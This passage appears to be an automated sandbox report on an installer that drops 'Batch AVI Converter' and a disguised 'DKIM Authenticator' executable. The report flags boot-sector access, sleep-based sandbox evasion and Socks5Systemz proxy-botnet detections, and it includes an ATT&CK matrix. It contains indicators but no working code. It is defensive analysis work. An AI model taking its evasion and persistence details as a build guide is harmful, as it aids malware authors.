        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx1_2_00494CB1
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx1_2_0048567D
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx1_2_00477B09
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx1_2_0045FD20
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
        Source: batchaviconverter32_64.exe.1.drStatic PE information: section name: .text entropy: 7.758900444364581
        Source: DKIM Authenticator lib 9.11.45.exe.3.drStatic PE information: section name: .text entropy: 7.758900444364581

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D8F7D5
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmpJump to dropped file
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-9JGQO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeFile created: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeFile created: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exeJump to dropped file

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D8F7D5
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_0040B846 StartServiceCtrlDispatcherA,lstrcmpiW,3_2_0040B846
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
        Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D8F8D9
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeWindow / User API: threadDelayed 921Jump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeWindow / User API: threadDelayed 8920Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-9JGQO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5972
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-18538
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140Thread sleep count: 921 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140Thread sleep time: -1842000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 4220Thread sleep count: 79 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 4220Thread sleep time: -4740000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140Thread sleep count: 8920 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140Thread sleep time: -17840000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeThread delayed: delay time: 60000Jump to behavior
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000827000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWn
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000827000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-6769
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeAPI call chain: ExitProcess graph end nodegraph_3-18539
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeAPI call chain: ExitProcess graph end nodegraph_3-19105
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02DA00FE
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02DA00FE
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D86487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,3_2_02D86487
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D99458 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D99458
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D97F9D cpuid 3_2_02D97F9D
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0040520C
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_00405258
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: GetLocaleInfoA,1_2_00408568
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: GetLocaleInfoA,1_2_004085B4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

        Stealing of Sensitive Information

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: batchaviconverter32_64.exe PID: 3220, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: batchaviconverter32_64.exe PID: 3220, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		1
        Deobfuscate/Decode Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		5
        Windows Service        		1
        DLL Side-Loading        		3
        Obfuscated Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Service Execution        		1
        Bootkit        		1
        Access Token Manipulation        		22
        Software Packing        		Security Account Manager2
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
        Windows Service        		1
        DLL Side-Loading        		NTDS35
        System Information Discovery        		Distributed Component Object ModelInput Capture112
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection        		1
        Masquerading        		LSA Secrets41
        Security Software Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Process Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation        		DCSync21
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
        Process Injection        		Proc Filesystem11
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit        		/etc/passwd and /etc/shadow3
        System Owner/User Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        Remote System Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        file.exe16%ReversingLabsWin32.Trojan.Munp

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe100%Joe Sandbox ML
        C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmp0%ReversingLabs
